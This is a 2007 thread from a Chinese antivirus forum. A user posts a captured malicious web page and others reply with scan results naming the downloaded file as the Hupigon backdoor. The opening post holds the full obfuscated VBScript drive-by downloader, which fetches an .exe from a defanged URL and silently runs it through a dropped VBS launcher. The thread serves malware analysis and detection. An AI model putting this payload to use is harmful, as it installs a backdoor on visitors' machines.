查看: 3778|回复: 23
收起左侧

[病毒样本] 可疑程式!!!

[复制链接]
mhj144007
发表于 2007-5-21 13:27:14 | 显示全部楼层 |阅读模式
取之

<html><body><center><script>
AiLiAn="hxxp://aiyouxi.myrice.com/6.exe"
</script>
<noscript>
<iframe src=*></iframe>
</noscript>
<sCrIpT LaNgUaGe="VBScript">
On eRrOr rEsUmE NeXt
zHaNjUfAn="o"&"b"&"j"
zHaNjUlAnG="e"&"c"&"t"
ZhAnJuFaNlAnG=ZhAnJuFaN&ZhAnJuLaNg
ZhAnFaN="c"&"l"
zHaNlAnG="a"&"s"&"s"
ZhAnZi="i"&"d"
ZhAnAiLiAn=zHaNfAn&zHaNlAnG&ZhAnZi
ZhAnJuF="c"&"l"&"s"
ZhAnJuFa="i"&"d"&":"
zHaNfAn="B"&"D"&"9"&"6C"&"55"&"6"&"-"
zHaNcEn="6"&"5"&"A"&"3"&"-"&"1"&"1"&"D"&"0"
zHaNc="-9"&"8"&"3A"&"-"
ZhAnJuZ="0"&"0"&"C"&"0"&"4"
ZhAnJuI="F"&"C"&"2"&"9"&"E"&"3"&"6"
ZhAnJuLaNg=zHaNjUf&zHaNjUfA&ZhAnFaN&ZhAnCeN&ZhAnC&ZhAnJuZ&ZhAnJuI
zHaNf="M"&"i"&"c"
zHaNfA="r"&"o"&"s"
ZhAnFn="o"&"f"&"t"&"."
ZhAnCn="X"&"M"&"L"
zHaNn="H"&"T"
ZhAnZ="T"&"P"
zHaNjUzI=ZhAnF&ZhAnFa&zHaNfN&ZhAnCn&zHaNn&zHaNz
ZhEf="S"&"c"&"r"&"i"
ZhEfA="p"&"ti"&"n"&"g"&"."
ZhEfN="F"&"i"&"l"&"e"&"S"
ZhEcN="y"&"s"&"t"&"e"
zHeN="m"&"O"&"b"
ZhEz="j"&"e"&"c"&"t"
ZhEzI=ZhEf&zHeFa&zHeCn&zHeCn&zHeN&ZhEz
ZhAnXu="Set"&" Wuer"&" ="&" HUA.GetSpecialFolder(2)"
SeT Zi = dOcUmEnT.CrEaTeElEmEnT(ZhAnJuFaNlAnG)
Zi.sEtAtTrIbUtE ZhAnAiLiAn, ZhAnJuLaNg
ZhOnGjIeZhE=ZhAnJuZi
SeT ZhOnGjIe = zI.CrEaTeObJeCt(zHoNgJiEzHe,"")
ZhOnGjIe.oPeN "GE"&"T", aIlIaN, fAlSe
ZhOnGjIe.sEnD
zHaNlAnGuSeR="msinfo.exe"
ZhAnLaNgOsEr="msinfo.vbs"
sEt hUa = zI.CrEaTeObJeCt(zHeZi,"")
SeT WdUeR =hUa.gEtSpElAnGzI
zHaNxU
zHaNlAnGuSeR=HuA.BuIlDpAtH(WuEr,zHaNlAnGuSeR)
ZhAnLaNgOsEr=hUa.bUiLdPaTh(wUeR,ZhAnLaNgOsEr)
zH="A"&"d"
hU="o"&"d"
wA="b"&"."&"s"&"t"
lU="r"&"e"&"a"&"m"
zHoGhAwNgLo=zH&Hu&wA&Lu
SeT LaNg = zI.CrEaTeObJeCt(zHoGhAwNgLo,"")
LaNg.tYpE=1
lAnG.OpEn
LaNg.wRiTe zHoNgJiE.ReSpOnSeBoDy
LaNg.sAvEtOfIlE ZhAnLaNgUsEr,2
LaNg.cLoSe
LaNg.tYpE=2
lAnG.OpEn
LaNg.wRiTeTeXt "Set Shell = CreateObject(""Wscript.Shell"")"&VbCrLf&"Shell.Run ("""&ZhAnLaNgUsEr&""")"&VbCrLf&"Set Shell = Nothing"
lAnG.SaVeToFiLe zHaNlAnGoSeR,2
lAnG.ClOsE
fLaNg="S"&"h"&"e"
aLaNg="l"&"l"&"."
nLaNg="A"&"p"&"p"&"l"&"i"
wAnGlUoLaNg=fLaNg&aLaNg&nLaNg
SeT ZhOnG = Zi.cReAtEoBjEcT(WaNgLuOlAnG&"cation","")
ZhOnG.ShElLeXeCuTe zHaNlAnGoSeR,"","","Open",0
</ScRiPt>

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
mofunzone
发表于 2007-5-21 13:29:07 | 显示全部楼层
Starting the file scan:

Begin scan in 'C:\TDDOWNLOAD\6.exe'
C:\TDDOWNLOAD\
  6.exe
      [DETECTION] Contains a signature of the (dangerous) backdoor program BDS/Hupigon.Gen Backdoor server programs
      [WARNING]   The file was ignored!
taihuxian
发表于 2007-5-21 13:30:10 | 显示全部楼层

avk2007

Virus: Backdoor.Win32.Hupigon.euw

Virus found while downloading Web content.

Address: bbs.kafan.cn
mofunzone
发表于 2007-5-21 13:30:28 | 显示全部楼层
第一次看见a-squared抓鸽子
A-Squared         
Found Backdoor.Win32.Hupigon.euw
AntiVir        
Found BDS/Hupigon.Gen
ArcaVir        
Found nothing
Avast        
Found Win32:Hupigon-OH
AVG Antivirus        
Found BackDoor.Generic6.FCD
BitDefender        
Found Backdoor.Hupigon.YBO
ClamAV        
Found Trojan.Graybird-16
Dr.Web        
Found nothing
F-Prot Antivirus        
Found nothing
F-Secure Anti-Virus        
Found Backdoor.Win32.Hupigon.euw
Fortinet        
Found BDoor.AWQ!tr.bdr
Kaspersky Anti-Virus        
Found Backdoor.Win32.Hupigon.euw
NOD32        
Found nothing
Norman Virus Control        
Found W32/Smalldoor.ANRX
Panda Antivirus        
Found nothing
Rising Antivirus        
Found nothing
VirusBuster        
Found nothing
VBA32        
Found nothing
tonger2003
发表于 2007-5-21 13:35:04 | 显示全部楼层
已检测到: 木马程序 Backdoor.Win32.Hupigon.euw URL: http://bbs.kafan.cn/attachment.php?aid=73745//6.exe
欠妳緈諨
发表于 2007-5-21 13:47:06 | 显示全部楼层
NOD32         
Found nothing
不过还是继续用
moonsilver
发表于 2007-5-21 13:49:38 | 显示全部楼层
瑞星Backdoor.Gpigeon.GEN
mofunzone
发表于 2007-5-21 13:49:48 | 显示全部楼层

回复 #6 欠你幸福 的帖子

你也不要太什么,我说过新挂的网马绝对有一半nod杀不了的,况且这个是鸽子,本身就不是nod的专长
而且对nod处理能力无语,哪怕一个星期有反应我也认了,不然我也会考虑用下nod的
p.s 如果有这种处理速度,nod也 不会挂到现在这么惨了
tracydk
发表于 2007-5-21 13:51:31 | 显示全部楼层
原帖由 mofunzone 于 2007-5-21 13:49 发表
你也不要太什么,我说过新挂的网马绝对有一半nod杀不了的,况且这个是鸽子,本身就不是nod的专长
而且对nod处理能力无语,哪怕一个星期有反应我也认了,不然我也会考虑用下nod的
p.s 如果有这种处理速 ...

NOD在处理上报方面和AVAST估计是半斤8两
tracydk
发表于 2007-5-21 13:52:37 | 显示全部楼层
我猜NOD和AVAST因该是和SYMANTEC那样,不大规模爆发的病毒是不处理的
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-5-4 19:59 , Processed in 0.122850 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表